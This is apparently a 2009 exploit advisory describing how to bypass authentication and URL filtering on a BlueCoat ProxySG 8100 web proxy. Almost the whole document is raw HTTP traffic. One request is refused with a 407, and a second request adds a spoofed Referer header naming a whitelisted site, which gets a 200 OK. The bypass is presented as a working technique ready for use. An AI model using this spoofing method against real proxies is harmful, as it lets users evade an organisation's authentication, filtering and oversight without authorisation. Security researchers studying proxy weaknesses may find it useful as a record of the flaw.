Title : ByPass a BlueCoat Proxy 8100 Serie (authentification request AND eventually the 3rd party url filtering solution) Date : 14/08/2009 Author : Antoine Santo ****************************************************************** Test one : Try to browse http://www.fcnantes.com/ Result : I need an Account ****************************************************************** GET http://www.fcnantes.com/ HTTP/1.1 Host: www.fcnantes.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive ----------------- HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: BASIC realm="ACCES" Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Proxy-Connection: close Set-Cookie: BCSI-CS-XXX0302B32A48XXX=2; Path=/ Connection: close Content-Length: 733 Authentification needed ****************************************************************************************** Test two : i just add a spoofed http header REFERER to a whitelisted (localdatabase) site Result : W00t !! ****************************************************************************************** GET http://www.fcnantes.com/ HTTP/1.1 Host: www.fcnantes.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Cookie: BCSI-CS-XXX0302B32A48XXX=2 Referer: http://www.mappy.fr ----------------- HTTP/1.1 200 OK Date: Fri, 14 Aug 2009 12:41:44 GMT Server: Apache/2.2.3 (Debian) Content-Type: text/html Transfer-Encoding: chunked Proxy-Connection: Keep-Alive Connection: Keep-Alive Age: 0 133f fcnantes.com - Site officiel du FC Nantes